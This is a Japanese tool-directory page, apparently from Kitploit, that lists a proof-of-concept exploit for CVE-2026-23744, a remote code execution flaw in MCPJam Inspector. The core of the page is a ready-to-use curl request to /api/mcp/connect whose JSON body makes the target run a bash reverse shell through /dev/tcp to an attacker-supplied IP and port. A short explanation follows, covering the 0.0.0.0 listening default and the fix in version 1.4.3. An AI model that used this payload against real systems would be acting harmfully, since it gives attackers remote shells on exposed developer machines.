Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744の概念実証エクスプロイト。MCPJam Inspectorのリモートコード実行脆弱性。リバースシェルペイロードを含む細工されたHTTPリクエストを/api/mcp/connectエンドポイントに送信することでRCEを実証します。 | Kitploit
ツール/GitHubGitHub/mrr0b0t19/cve-2026-23744-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmrr0b0t19/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744の概念実証エクスプロイト。MCPJam Inspectorのリモートコード実行脆弱性。リバースシェルペイロードを含む細工されたHTTPリクエストを/api/mcp/connectエンドポイントに送信することでRCEを実証します。

リポジトリを見る
43ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744-PoC

MCP Server の脆弱性に関する PoC。

適切な本文を持つ投稿部分を自動化しました。

脆弱なパス:

/api/mcp/connect

curl による方法:

curl http://evil.com:6274/api/mcp/connect   --header "Content-Type: application/json"   --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'

なぜ発生するのか?

MCPJam Inspector は、MCP サーバー向けの最初のローカル開発プラットフォームです。バージョン 1.4.2 以前はリモートコード実行 (RCE) の脆弱性の影響を受けます。この脆弱性により、攻撃者は細工した HTTP リクエストを送信して MCP サーバーのインストールをトリガーし、RCE を引き起こすことができます。MCPJam Inspector はデフォルトで 127.0.0.1 ではなく 0.0.0.0 でリッスンするため、攻撃者は単純な HTTP リクエストでリモートから RCE を引き起こすことができます。バージョン 1.4.3 にはパッチが含まれています。

ツールをダウンロード